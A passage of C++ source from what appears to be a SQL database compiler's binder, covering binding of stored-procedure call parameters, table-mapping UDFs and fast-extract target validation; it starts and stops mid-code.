!bindWA->errStatus() && catRoutine ) { // if found in public schema, do not show previous error CmpCommon::diags()->clear(); } } if (bindWA->violateAccessDefaultSchemaOnly(getRoutineName())) return NULL; if ( NULL == catRoutine ) { // Diagnostic error is set by the readRoutineDef, we just need to // make sure the rest of the compiler knows that an error occurred. bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } // Create a new NARoutine object Int32 error = FALSE; NARoutine *routine = new (bindWA->wHeap()) NARoutine ( getRoutineName(), catRoutine, bindWA, error ); if ( bindWA->errStatus () ) { // Error bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } NABoolean createRETDesc=TRUE; RoutineDesc *rDesc = new (bindWA->wHeap()) RoutineDesc(bindWA, routine); if (rDesc == NULL || bindWA->errStatus ()) { // Error bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } if (rDesc->populateRoutineDesc(bindWA, createRETDesc) == FALSE ) { bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } setRoutineDesc(rDesc); // // Semantic checks // // if in trigger and during DDL make sure to Fix up the name // location list so that the name is fully qualified when stored // in the TEXT metadata table if ( bindWA->inDDL() && bindWA->isInTrigger () ) { ParNameLocList *pNameLocList = bindWA->getNameLocListPtr(); if (pNameLocList) { ParNameLoc * pNameLoc = pNameLocList->getNameLocPtr(getRoutineName().getNamePosition()); CMPASSERT(pNameLoc); pNameLoc->setExpandedName(getRoutineName().getQualifiedNameAsAnsiString()); } } // Cannot support result sets or out params when // SP is invoked within a trigger if ( bindWA->isInTrigger () && getNARoutine()->hasOutParams ()) { *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_OUTPARAM_IN_TRIGGER) << DgTableName (getRoutineName().getQualifiedNameAsString()); bindWA->setErrStatus (); bindWA->setBindingCall (FALSE); return this; } if ( bindWA->isInTrigger () && getNARoutine()->hasResultSets ()) { *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_RESULTSETS_IN_TRIGGER) << DgTableName (getRoutineName().getQualifiedNameAsString()); bindWA->setErrStatus (); bindWA->setBindingCall (FALSE); return this; } const NAColumnArray &params = getNARoutine()->getParams (); CollIndex i = 0; CollIndex numParams = getNARoutine()->getParamCount (); CollIndex numSuppliedParams = countSuppliedParams (getRWProcAllParamsTree()); if (numSuppliedParams != numParams) { *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_INCORRECT_PARAM_COUNT) << DgTableName(getRoutineName().getQualifiedNameAsString()) << DgInt0((Lng32) numParams) << DgInt1((Lng32) numSuppliedParams); bindWA->setErrStatus (); bindWA->setBindingCall (FALSE); return this; } short numResultSets = (short) getNARoutine()->getMaxResults(); bindWA->setMaxResultSets(numResultSets); // On to the binding // Invoke populateAndBindItemExpr, set up needed data structures // Set up a RETDesc if we don't already have one. RETDesc *resultTable = getRETDesc(); if (resultTable == NULL) { resultTable = new (bindWA->wHeap()) RETDesc(bindWA); setRETDesc(resultTable); } populateAndBindItemExpr ( getRWProcAllParamsTree(), bindWA ); if ( bindWA->errStatus ()) { bindWA->setBindingCall (FALSE); return this; } // Clear the Tree since we now have gotten vids for all the parameters. setProcAllParamsTree(NULL); // Now fix the param index value of the dynamic params or host vars LIST (ItemExpr *) &bWA_HVorDPs = bindWA->getSpHVDPs(); CollIndex numHVorDPs = bWA_HVorDPs.entries(); ARRAY(ItemExpr *) local_HVorDPs(numHVorDPs); CollIndex idx, idx1, idx2; // Sort the ItemExpr in the order they appeared in the stmt for (idx = 0; idx < numHVorDPs; idx++) { // Copy ItemExpr ptrs to a sorted Array. local_HVorDPs.insertAt(bWA_HVorDPs[idx]->getHVorDPIndex() - 1, bWA_HVorDPs[idx]); } // The following code goes through the list of Exprs and // sets index values. The rules are: // 1. When a DP or HV is repeated, all of them get the same // index value which is equal to the index of the first occurrence // 2. Two DPs or HVs are same if their names and the modes are same. Int32 currParamIndex = 1; for (idx1 = 0; idx1 < numHVorDPs; idx1++) { ItemExpr *src = local_HVorDPs[idx1]; const NAString &name1 = (src->getOperatorType() == ITM_HOSTVAR) ? ((HostVar *)src)->getName() : ((DynamicParam *)src)->getName(); ComColumnDirection mode1 = src->getParamMode(); NABoolean encounteredElement = FALSE; for (idx2 = idx1; idx2 < numHVorDPs; idx2++) { ItemExpr *dest = local_HVorDPs[idx2]; if (!encounteredElement && dest->getHVorDPIndex() >= currParamIndex) { // The parameter is encountered the first time encounteredElement = TRUE; dest->setPMOrdPosAndIndex(dest->getParamMode(), dest->getOrdinalPosition(), currParamIndex); continue; } // The parameter is already corrected if (dest->getHVorDPIndex() < currParamIndex) continue; const NAString &name2 = (dest->getOperatorType() == ITM_HOSTVAR) ? ((HostVar *)dest)->getName() : ((DynamicParam *)dest)->getName(); ComColumnDirection mode2 = dest->getParamMode(); if (name2.compareTo("") == 0) continue; if (name1.compareTo(name2) == 0 && mode1 == mode2) { dest->setPMOrdPosAndIndex(dest->getParamMode(), dest->getOrdinalPosition(), currParamIndex); } } if (encounteredElement) currParamIndex++; } // Restore the bindWA's HVorDP list since it might be needed // while binding the root node in case of HVs. bindWA->clearHVorDPinSPDups(); for (idx = 0; idx < numHVorDPs; idx++) bindWA->addHVorDPToSPDups(local_HVorDPs[idx]); // Create a tuple child for any subqueries or UDF inputs // The hasSubquery() / hasUDF() flag gets set in setInOrOutParam if any of our // passed in parameters is a subquery. if ((getProcInputParamsVids().entries() != 0) && (hasSubquery() || hasUDF())) { Tuple *inTuple = new (bindWA->wHeap()) Tuple(getProcInputParamsVids().rebuildExprTree(ITM_ITEM_LIST), bindWA->wHeap()); if ( inTuple ) { // Now set and bind the Tuple child setChild (0, inTuple); // Bind this Tuple child inTuple->bindNode (bindWA); if ( bindWA->errStatus ()) { bindWA->setBindingCall (FALSE); return this; } // Get each IN entry from the Tuple and put it in //the super's list // Need to clear the list to avoid duplicates getProcInputParamsVids().clear(); // Now reinitialize the inputs based on the Tuple processing. inTuple->getRETDesc ()->getValueIdList (getProcInputParamsVids()); } // if inTuple else { // Out of memory ... bindWA->setBindingCall (FALSE); bindWA->setErrStatus(); return this; } } // if getProcInputParamVids().entries() else { // If we dont have a subquery parameter, we dont need to go thru // Optimization time rules and transformations, hence mark this // as a physical node. isPhysical_ = TRUE; } // // Not sure whether we need to set the currently scoped RETDesc // before binding the base class. Tuple::bindNode() does not do it // so we won't either (for now) // //bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // add the routine to the UdrStoiList. The UdrStoi list is used // to check valid privileges LIST(OptUdrOpenInfo *) udrList = bindWA->getUdrStoiList (); ULng32 numUdrs = udrList.entries(); NABoolean udrReferenced = FALSE; // See if UDR already exists for (ULng32 stoiIndex = 0; stoiIndex < numUdrs; stoiIndex++) { if ( 0 == udrList[stoiIndex]->getUdrName().compareTo( getRoutineName().getQualifiedNameAsAnsiString() ) ) { udrReferenced = TRUE; break; } } // UDR has not been defined, go ahead an add one if ( FALSE == udrReferenced ) { SqlTableOpenInfo *udrStoi = new (bindWA->wHeap ())SqlTableOpenInfo (); udrStoi->setAnsiName ( convertNAString( getRoutineName().getQualifiedNameAsAnsiString(), bindWA->wHeap ()) ); OptUdrOpenInfo *udrOpenInfo = new (bindWA->wHeap ()) OptUdrOpenInfo( udrStoi , getRoutineName().getQualifiedNameAsAnsiString() , (NARoutine *)getNARoutine() ); bindWA->getUdrStoiList().insert(udrOpenInfo); } // // Bind the base class // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) { bindWA->setBindingCall (FALSE); return boundExpr; } // Our characteristic inputs get set for us, we don't need to do it // ourselves, however, we need to set our characteristic outputs getGroupAttr()->addCharacteristicOutputs(getProcOutputParamsVids()); if (getNARoutine()->isProcedure()) bindWA->setHasCallStmts(TRUE); bindWA->setBindingCall (FALSE); return boundExpr; } // CallSP::bindNode() // This is the main entry point to walking the ItemExpr tree built by the // parser, separating the IN and OUT parameters, setting appropriate // characteristics of the IN/OUT parameters and binding them // Currently only CallSP uses this code. If this routine needs to be shared void IsolatedNonTableUDR::populateAndBindItemExpr ( ItemExpr *param, BindWA *bindWA ) { // This method is called recursively CollIndex numParams = getEffectiveNARoutine()->getParamCount (); CollIndex ordinalPosition = bindWA->getCurrOrdinalPosition (); // No parameters, or we are done with the leaf node if ( NULL == param ) { return; } ComColumnDirection mode = getEffectiveNARoutine()->getParams()[ordinalPosition-1]->getColumnMode (); // This is the structure of the ItemExpr tree // For 1 param // ItemExpr // // 2 params // ItemList // / \ // Param1 Param2 // // > 2 params // ItemList // / \ // Param1 ItemList // / \ // Param2 ItemList // ... ... // ... ... // / / \ // Param (N-2) / \ // / \ // Param(N-1) Param(N) if ( ITM_ITEM_LIST == param->getOperatorType ()) { // Use left child CMPASSERT ((ItemExpr *) NULL != (*param).child (0)); populateAndBindItemExpr ( (*param).child(0), bindWA ); if ( bindWA->errStatus ()) return; // Now for the right child CMPASSERT ((ItemExpr *) NULL != (*param).child (1)); populateAndBindItemExpr ( (*param).child(1), bindWA ); return; } // if ITM_ITEM_LIST == param->getOperatorType () // For all leaf nodes we must come here (see the recursive call to // populateAndBindItemExp above) // Set the bindWA's current ordinal position and parameter mode // Let HV and DynamicParam's bindNode take care of the // settings. To ensure this, do a bindNode here bindWA->setCurrParamMode (mode); param->bindNode (bindWA); if (bindWA->errStatus ()) return; // Add the IN or OUT params to their respective lists // and also create and bind a new ItemExpr for INOUT and OUT // params. // Also bump up the ordinalPosition count since we are done with this // parameter. setInOrOutParam (param,/* ordinalPosition,*/ mode, bindWA); if ( bindWA->errStatus ()) return; bindWA->setCurrOrdinalPosition (bindWA->getCurrOrdinalPosition () + 1); } // PopulateAndBindItemExpr // LCOV_EXCL_START - rfi void IsolatedNonTableUDR::setInOrOutParam (ItemExpr *expr, ComColumnDirection paramMode, BindWA *bindWA) { // Should not get here.. CMPASSERT(FALSE); } // LCOV_EXCL_STOP // This method separates the IN and OUT parameters Each IN/INOUT param // is cast to the formal type (from NARoutine). This Cast'ed item expr // is added to an ItemList tree to be passed to the Tuple () // constructor. For each OUT/INOUT, we create a NATypeToItem // ItemExpr, bind it and add it to procOutParams_. // // This method is called once for each CALL statement argument. If an // input argument to a CALL is an expression tree such as "? + ?" or // "abs(:x)" then this method is called once for the entire tree. // // Side Effects: OUT: hasSubquery_ // neededValueIds_ // procAllParamsVids_ // procInputParamsVids_ // procOutputParamsVids_ void CallSP::setInOrOutParam ( ItemExpr *expr, ComColumnDirection paramMode, BindWA *bindWA) { // Depending on whether this is an IN or OUT parameter, we need to // take different actions. // For an IN (and INOUT) param, do the following // Cast the parameter to its formal type and add it to the list of // IN params. This will be used later to create a Tuple child and // be bound by the Tuple itself CollIndex ordinalPosition = bindWA->getCurrOrdinalPosition (); const NAColumnArray &formalParams = getNARoutine()->getParams(); NAColumn &naColumn = *(formalParams[ordinalPosition-1]); const NAType &paramType = *(naColumn.getType()); // Don't really want to bind this, but how else can we // get the ItemExpr's type ItemExpr *boundExpr = expr->bindNode (bindWA); if ( bindWA->errStatus ()) { return; } //10-061031-0188-Begin //Need to infer charset for string literals part of CALLSP //parameters ValueId inputTypeId = boundExpr->getValueId(); if(inputTypeId.getType().getTypeQualifier() == NA_CHARACTER_TYPE) { const CharType* stringLiteral = (CharType*)&(inputTypeId.getType()); if(CmpCommon::wantCharSetInference()) { const CharType* desiredType = CharType::findPushDownCharType(((CharType&)paramType).getCharSet(), stringLiteral, 0); if ( desiredType ) inputTypeId.coerceType((NAType&)*desiredType, NA_CHARACTER_TYPE); } } NABoolean throwInTranslateNode = FALSE; CharInfo::CharSet paramCS = CharInfo::UnknownCharSet; CharInfo::CharSet inputCS = CharInfo::UnknownCharSet; const NABoolean isJdbc = (CmpCommon::getDefault(JDBC_PROCESS) == DF_ON ? TRUE : FALSE); const NABoolean isOdbc = (CmpCommon::getDefault(ODBC_PROCESS) == DF_ON ? TRUE : FALSE); const NAType &inputType = inputTypeId.getType(); //10-061031-0188-End if ( COM_INPUT_COLUMN == paramMode || COM_INOUT_COLUMN == paramMode ) { // If this input argument to the CALL is a single dynamic param // then we want to record the formal parameter name. It will later // be written into the query plan by the code generator and // eventually if this CALL statement is DESCRIBEd, the formal // param name gets returned in the SQLDESC_NAME descriptor entry. if (expr->getOperatorType() == ITM_DYN_PARAM) { DynamicParam *dp = (DynamicParam *) expr; dp->setUdrFormalParamName(naColumn.getColName()); } // Check to see if we have a Subquery as an input if ( !hasSubquery() ) hasSubquery() = expr->containsSubquery (); // Check to see if we have a UDF as an input if ( !hasUDF() ) hasUDF() = (expr->containsUDF () != NULL); // Do type checking, // If it is not a compatible type report an error if (!( NA_UNKNOWN_TYPE == inputType.getTypeQualifier () || paramType.isCompatible(inputType) || expr->getOperatorType () == ITM_DYN_PARAM ) ) { if ( inputType.getTypeQualifier() == NA_CHARACTER_TYPE ) { paramCS = ((CharType&)paramType).getCharSet(); inputCS = ((CharType&)inputType).getCharSet(); NABoolean CS_unknown = (paramCS == CharInfo::UnknownCharSet) || (inputCS == CharInfo::UnknownCharSet) ; if ( paramType.NAType::isCompatible(inputType) && paramCS != inputCS && CS_unknown == FALSE && CmpCommon::getDefault(ALLOW_IMPLICIT_CHAR_CASTING) == DF_ON ) throwInTranslateNode = TRUE; } if ( throwInTranslateNode == FALSE ) { // Error, data types dont match #pragma nowarn(1506) // warning elimination *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_PARAM_TYPE_MISMATCH) << DgInt0 (ordinalPosition) << DgTableName(getRoutineName().getQualifiedNameAsString()) << DgString0 (inputType.getTypeSQLname (TRUE)) << DgString1 (paramType.getTypeSQLname (TRUE)); #pragma warn(1506) // warning elimination bindWA->setErrStatus (); return; } } // if NOT isCompatible // Create a Cast node if the types are not identical if (! (inputType == paramType)) { // First create a Translate node if the character sets are not identical if ( throwInTranslateNode ) { Int32 tran_type = find_translate_type( inputCS, paramCS ); ItemExpr * newTranslateChild = new (bindWA->wHeap()) Translate(boundExpr, tran_type ); boundExpr = newTranslateChild->bindNode(bindWA); if (bindWA->errStatus()) return; // NOTE: Leave "expr" at it's old value as code below needs to check // that original ItemExpr rather than the new Translate node. } Cast *retExpr = new (bindWA->wHeap()) Cast(boundExpr, &paramType, ITM_CAST, TRUE); boundExpr = retExpr->bindNode (bindWA); if ( bindWA->errStatus ()) { return; } } // Fill the ValueIdList for all the params getProcAllParamsVids().insert( boundExpr->getValueId()); // Fill the ValueIdList for Input params getProcInputParamsVids().insert( boundExpr->getValueId()); } // if INPUT or INOUT // For OUT (and INOUT) parameters, we create a NATypeToItem object, // bind it and add it to the list of OUT parameters (procOutParams_) if ( COM_OUTPUT_COLUMN == paramMode || COM_INOUT_COLUMN == paramMode ) { if (!( ITM_HOSTVAR == expr->getOperatorType () || ITM_DYN_PARAM == expr->getOperatorType ())) { #pragma nowarn(1506) // warning elimination *CmpCommon::diags() << DgSqlCode(-UDR_BINDER_OUTVAR_NOT_HV_OR_DP) << DgInt0(ordinalPosition) << DgTableName(getRoutineName().getQualifiedNameAsString()); #pragma warn(1506) // warning elimination bindWA->setErrStatus (); return; } // if NOT HOSTVAR or DYNAMIC PARAM NATypeToItem *paramTypeItem = new (bindWA->wHeap()) NATypeToItem (naColumn.mutateType()); ItemExpr *outputExprToBind = NULL; outputExprToBind = paramTypeItem->bindNode (bindWA); if ( bindWA->errStatus ()) { return; } // Fill the ValueIdList for all the params getProcAllParamsVids().insert( outputExprToBind->getValueId()); // Fill the ValueIdList for the output params addProcOutputParamsVid(outputExprToBind->getValueId ()); // // Populate our RETDesc // // It has already been alocated RETDesc *resultTable = getRETDesc(); const NAString &formalParamName = naColumn.getColName(); const NAString *colParamName = &formalParamName; // Set the userParamName const NAString &userParamName = // cannot use the boundExpr here as it will be a cast() // for the HostVar or DynamicParam. Use the original // ItemExpr pointer instead. (ITM_HOSTVAR == expr->getOperatorType()) ? ((HostVar *)expr)->getName() : ((DynamicParam *)expr)->getName(); // Typically the name for this output column will be the formal // parameter name. Exceptions: // - No formal name was specified in the CREATE PROCEDURE. Use // the (possibly empty) dynamic parameter or host variable name // instead. // - This is a JDBC or ODBC compile and the client is using a // named host variable or dynamic parameter. JDBC and ODBC want // us to use the client's name in this case. if (formalParamName.isNull() || (!userParamName.isNull() && (isJdbc || isOdbc))) { colParamName = &userParamName; } ColRefName *columnName = new (bindWA->wHeap()) ColRefName(*colParamName, bindWA->wHeap()); resultTable->addColumn(bindWA, *columnName, outputExprToBind->getValueId()); // // We need the following line for static cursor declaration, // according to a comment in bindRowValues() // cmpCurrentContext->saveRetrievedCols_ = resultTable->getDegree(); } // if OUTPUT or INOUT } // setInOrOutParam CollIndex RelRoutine::countSuppliedParams (ItemExpr *tree) const { CollIndex numParams=0; if ( !tree ) return 0; if (ITM_ITEM_LIST == tree->getOperatorType ()) { numParams += countSuppliedParams (tree->child (0)); numParams += countSuppliedParams (tree->child (1)); } else numParams++; return numParams; } // RelRoutine::countSuppliedParams void RelRoutine::gatherParamValueIds (const ItemExpr *tree, ValueIdList &paramsList) const { if ( !tree ) return; if (ITM_ITEM_LIST == tree->getOperatorType ()) { gatherParamValueIds (tree->child (0), paramsList); gatherParamValueIds (tree->child (1), paramsList); } else paramsList.insert(tree->getValueId()); } // RelRoutine::gatherParamValueIds void ProxyFunc::createProxyFuncTableDesc(BindWA *bindWA, CorrName &corrName) { // Map column definitions into a desc_struct desc_struct *tableDesc = createVirtualTableDesc(); // Map the desc_struct into an NATable. This will also add an // NATable entry into the bindWA's NATableDB. NATable *naTable = bindWA->getNATable(corrName, FALSE /*catmanUsages*/, tableDesc); if (bindWA->errStatus()) return; // Allocate a TableDesc and attach it to this RelExpr instance setTableDesc(bindWA->createTableDesc(naTable, corrName)); if (bindWA->errStatus()) return; // Allocate a RETDesc and attach it to this and the BindScope setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); } RelExpr *ProxyFunc::bindNode(BindWA *bindWA) { // This method now serves as a common bind node for SPProxy and // ExtractSource classes, where we before had SPProxyFunc::bindNode() // and ExtractSource::bindNode(). if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Bind the child nodes bindChildren(bindWA); if (bindWA->errStatus()) return this; // Declare a correlation name that is unique within this query switch (getOperatorType()) { case REL_EXTRACT_SOURCE: virtualTableName_ = "EXTRACT_SOURCE_"; break; case REL_SP_PROXY: virtualTableName_ = "SP_RESULT_SET_"; break; default: CMPASSERT(0); break; } virtualTableName_ += bindWA->fabricateUniqueName(); CorrName corrName(getVirtualTableName()); corrName.setSpecialType(ExtendedQualName::VIRTUAL_TABLE); createProxyFuncTableDesc(bindWA, corrName); if (bindWA->errStatus()) return this; // Bind the base class RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // Assign the set of columns that belong to the virtual table // as the output values that can be produced by this node. getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); return boundExpr; } // ProxyFunc::bindNode() RelExpr *TableMappingUDF::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Create NARoutine object (no caching for TMUDF) NARoutine *tmudfRoutine =NULL; CorrName& tmfuncName = getUserTableName(); tmfuncName.setSpecialType(ExtendedQualName::VIRTUAL_TABLE); QualifiedName name = getRoutineName(); const SchemaName &defaultSchema = bindWA->getSchemaDB ()->getDefaultSchema(); name.applyDefaults(defaultSchema); setRoutineName(name); // Return an error if an unsupported catalog is being used. if ((NOT name.isSeabase()) && (NOT name.isHive())) { *CmpCommon::diags() << DgSqlCode(-1002) << DgCatalogName(name.getCatalogName()) << DgString0(""); bindWA->setErrStatus(); return NULL; } Lng32 diagsMark = CmpCommon::diags()->mark(); NABoolean errStatus = bindWA->errStatus(); tmudfRoutine = getRoutineMetadata(name, tmfuncName, bindWA); if (tmudfRoutine == NULL) { // this could be a predefined TMUDF, which is not // recorded in the metadata at this time OperatorTypeEnum opType = PredefinedTableMappingFunction::nameIsAPredefinedTMF(tmfuncName); if (opType != REL_TABLE_MAPPING_UDF) { // yes, this is a predefined TMUDF PredefinedTableMappingFunction *result; // discard the errors from the failed name lookup CmpCommon::diags()->rewind(diagsMark); if (!errStatus) bindWA->resetErrStatus(); // create a new RelExpr result = new(bindWA->wHeap()) PredefinedTableMappingFunction( tmfuncName, const_cast<ItemExpr *>(getProcAllParamsTree()), opType); // copy data members of the base classes TableMappingUDF::copyTopNode(result); // set children result->setArity(getArity()); for (int i=0; i<getArity(); i++) result->child(i) = child(i); // Abandon the current node and return the bound new node. // Next time it will reach this method it will call an // overloaded getRoutineMetadata() that will succeed. return result->bindNode(bindWA); } // getRoutineMetadata has already set the diagnostics area // and set the error status CMPASSERT(bindWA->errStatus()); return NULL; } // Bind the child nodes. bindChildren(bindWA); if (bindWA->errStatus()) return this; // Use information from child to populate childInfo_ NAHeap *heap = CmpCommon::statementHeap(); for(Int32 i = 0; i < getArity(); i++) { NAString childName(heap); NAColumnArray childColumns(heap) ; RETDesc *childRetDesc = child(i)->getRETDesc(); // Get Name LIST(CorrName*) nameList; childRetDesc->getXTNM().dumpKeys(nameList); if (nameList.entries() == 1) { childName = (nameList[0])->getExposedNameAsString(); } else { childName = "_inputTable" + bindWA->fabricateUniqueName(); } // ask for histograms of all child outputs, since we don't // know what the UDF will need and what predicates exist // on passthru columns of the UDF bindWA->getCurrentScope()->context()->inWhereClause() = TRUE; // Get NAColumns CollIndex numChildCols = childRetDesc->getColumnList()->entries(); for(CollIndex j=0; j < numChildCols; j++) { NAColumn * childCol = new (heap) NAColumn( childRetDesc->getColRefNameObj(j).getColName().data(), j, childRetDesc->getType(j).newCopy(heap), heap); childColumns.insert(childCol); bindWA->markAsReferencedColumn(childRetDesc->getValueId(j)); } bindWA->getCurrentScope()->context()->inWhereClause() = FALSE; // get child root CMPASSERT(child(i)->getOperator().match(REL_ROOT) || child(i)->getOperator().match(REL_RENAME_TABLE)); RelRoot * myChild; if (child(i)->getOperator().match(REL_RENAME_TABLE)) myChild = (RelRoot *) (child(i)->child(0).getPtr()); else myChild = (RelRoot *) child(i).getPtr(); // output vidList from child RetDesc, // can also get from child Root compExpr ValueIdList vidList; childRetDesc->getValueIdList(vidList, USER_COLUMN); ValueIdSet childPartition(myChild->partitionArrangement()); ValueIdList childOrder(myChild->reqdOrder()); // request multi-column histograms for the PARTITION BY columns bindWA->getCurrentScope()->context()->inGroupByClause() = TRUE; // replace 1-based ordinals in the child's partition by / order by with // actual columns for (ValueId cp=childPartition.init(); childPartition.next(cp); childPartition.advance(cp)) { NABoolean negate; ConstValue *cv = cp.getItemExpr()->castToConstValue(negate); if (cv && cv->canGetExactNumericValue()) { Lng32 scale = 0; Int64 ordinal = cv->getExactNumericValue(scale); if (!negate && scale == 0 && ordinal >= 1 && ordinal <= vidList.entries()) { // remove this ValueId from the set and add the corresponding // column value. Note that this won't cause problems with the // iterator through the set, since we don't need to apply // this conversion on the new element we are inserting childPartition -= cp; childPartition += vidList[ordinal-1]; } else { *CmpCommon::diags() << DgSqlCode(-11154) << DgInt0(ordinal) << DgString0("PARTITION BY") << DgInt1(vidList.entries()); bindWA->setErrStatus(); return NULL; } } bindWA->markAsReferencedColumn(cp); } bindWA->getCurrentScope()->context()->inGroupByClause() = FALSE; for (CollIndex co=0; co<childOrder.entries(); co++) { NABoolean negate; ItemExpr *ie = childOrder[co].getItemExpr(); ConstValue *cv = NULL; if (ie->getOperatorType() == ITM_INVERSE) ie = ie->child(0); cv = ie->castToConstValue(negate); if (cv && cv->canGetExactNumericValue()) { Lng32 scale = 0; Int64 ordinal = cv->getExactNumericValue(scale); // replace the const value with the actual column if (!negate && scale == 0 && ordinal >= 1 && ordinal <= vidList.entries()) if (ie == childOrder[co].getItemExpr()) { // ascending order childOrder[co] = vidList[ordinal-1]; } else { // desc order, need to add an InverseOrder on top ItemExpr *inv = new(bindWA->wHeap()) InverseOrder( vidList[ordinal-1].getItemExpr()); inv->synthTypeAndValueId(); childOrder[co] = inv->getValueId(); } else { *CmpCommon::diags() << DgSqlCode(-11154) << DgInt0(ordinal) << DgString0("ORDER BY") << DgInt1(vidList.entries()); bindWA->setErrStatus(); return NULL; } } } TableMappingUDFChildInfo * cInfo = new (heap) TableMappingUDFChildInfo( childName, childColumns, myChild->getPartReqType(), childPartition, childOrder, vidList); childInfo_.insert(cInfo); } RoutineDesc *tmudfRoutineDesc = new (bindWA->wHeap()) RoutineDesc(bindWA, tmudfRoutine); if (tmudfRoutineDesc == NULL || bindWA->errStatus ()) { // Error bindWA->setBindingCall (FALSE); bindWA->setErrStatus (); return this; } setRoutineDesc(tmudfRoutineDesc); // xcnm will be empty because the routineDesc does not contain any // output columns yet RETDesc *rDesc = new (bindWA->wHeap()) RETDesc(bindWA, tmudfRoutineDesc); bindWA->getCurrentScope()->setRETDesc(rDesc); setRETDesc(rDesc); dllInteraction_ = new (bindWA->wHeap()) TMUDFDllInteraction(); // ValueIDList of the actual input parameters // (tmudfRoutine has formal parameters) if (getProcAllParamsTree() && (getProcAllParamsVids().isEmpty() == TRUE)) { ((ItemExpr *)getProcAllParamsTree())->convertToValueIdList( getProcAllParamsVids(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return NULL; // Clear the Tree since we now have gotten vids for all the parameters. setProcAllParamsTree(NULL); } getProcInputParamsVids().insert(getProcAllParamsVids()); // invoke the optional UDF compiler interface or a default // implementation to validate scalar inputs and produce a list of // output columns NABoolean status = dllInteraction_->describeParamsAndMaxOutputs(this, bindWA); if (!status) { bindWA->setErrStatus(); return NULL; } checkAndCoerceScalarInputParamTypes(bindWA); if (bindWA->errStatus()) return NULL; createOutputVids(bindWA); if (bindWA->errStatus()) return NULL; // create a ValueIdMap that allows us to translate // output columns that are passed through back to // input columns (outputs of the child), this can // be used to push down predicates, translate // required order and partitioning, etc. status = dllInteraction_->createOutputInputColumnMap( this, udfOutputToChildInputMap_); if (!status) { bindWA->setErrStatus(); return NULL; } // if this is a maintenance-type operation that must run on // all nodes of the cluster or must run in parallel, regardless // of the ATTEMPT_ESP_PARALLELISM CQD, then set a flag in the // root node if (getOperatorType() == REL_TABLE_MAPPING_BUILTIN_LOG_READER) bindWA->getTopRoot()->setMustUseESPs(TRUE); // add the routine to the UdrStoiList. The UdrStoi list is used // to check valid privileges LIST(OptUdrOpenInfo *) udrList = bindWA->getUdrStoiList (); ULng32 numUdrs = udrList.entries(); NABoolean udrReferenced = FALSE; // See if UDR already exists for (ULng32 stoiIndex = 0; stoiIndex < numUdrs; stoiIndex++) { if ( 0 == udrList[stoiIndex]->getUdrName().compareTo( getRoutineName().getQualifiedNameAsAnsiString() ) ) { udrReferenced = TRUE; break; } } // UDR has not been defined, go ahead an add one if ( FALSE == udrReferenced ) { SqlTableOpenInfo *udrStoi = new (bindWA->wHeap ())SqlTableOpenInfo (); udrStoi->setAnsiName ( convertNAString( getRoutineName().getQualifiedNameAsAnsiString(), bindWA->wHeap ()) ); OptUdrOpenInfo *udrOpenInfo = new (bindWA->wHeap ()) OptUdrOpenInfo( udrStoi , getRoutineName().getQualifiedNameAsAnsiString() , (NARoutine *)getNARoutine() ); bindWA->getUdrStoiList().insert(udrOpenInfo); } RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return NULL; return boundExpr; } RelExpr * FastExtract::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // check validity of target location if (getTargetType() == FILE) { char reasonMsg[256]; NABoolean raiseError = FALSE; if ((unsigned char)(getTargetName().data()[0]) != SLASH_C) { raiseError = TRUE; sprintf(reasonMsg,"Relative path name was used"); } else if (getTargetName().length() > 512) { raiseError = TRUE; sprintf(reasonMsg,"Length exceeds 512 characters"); } else { char * sqroot = getenv("MY_SQROOT"); if (sqroot && (! CmpCommon::context()->getSqlmxRegress()) && (strncmp(sqroot, getTargetName().data(),strlen(sqroot)) == 0)) { raiseError = TRUE; sprintf(reasonMsg,"Database system directory was used"); } } if (raiseError && strncmp(getTargetName().data(),"hdfs://",7) != 0 ) { *CmpCommon::diags() << DgSqlCode(-4378) << DgString0(reasonMsg) ; bindWA->setErrStatus(); return NULL; } } if (getDelimiter().length() == 0) { delimiter_ = ActiveSchemaDB()->getDefaults().getValue(TRAF_UNLOAD_DEF_DELIMITER); } if (getNullString().length() == 0) { nullString_ = ActiveSchemaDB()->getDefaults().getValue(TRAF_UNLOAD_DEF_NULL_STRING); } if (getRecordSeparator().length() == 0) { recordSeparator_ = ActiveSchemaDB()->getDefaults().getValue(TRAF_UNLOAD_DEF_RECORD_SEPARATOR); } if (!isHiveInsert()) { bindWA->setIsFastExtract(); } // Bind the child nodes. bindChildren(bindWA); if (bindWA->errStatus()) return this; // Use information from child to populate childInfo_ NAHeap *heap = CmpCommon::statementHeap(); RETDesc *childRETDesc = child(0)->getRETDesc(); // output vidList from child RetDesc, // can also get from child Root compExpr ValueIdList vidList; childRETDesc->getValueIdList(vidList, USER_COLUMN); setSelectList(vidList); if (includeHeader()) { const ColumnDescList &columnsRET = *(childRETDesc->getColumnList()); for (CollIndex i = 0; i < columnsRET.entries(); i++) { if (columnsRET[i]->getHeading()) header_ += columnsRET[i]->getHeading(); else if (!(columnsRET[i]->getColRefNameObj().isEmpty())) header_ += columnsRET[i]->getColRefNameObj().getColName(); else header_ += "EXPR"; if (i < (columnsRET.entries() -1)) { header_ += " "; header_ += delimiter_; header_ += " "; } } } else { header_ = "NO_HEADER" ; } // no rows are returned from this operator. // Allocate an empty RETDesc and attach it to this and the BindScope. setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA)); RelExpr *boundExpr = bindSelf(bindWA); if 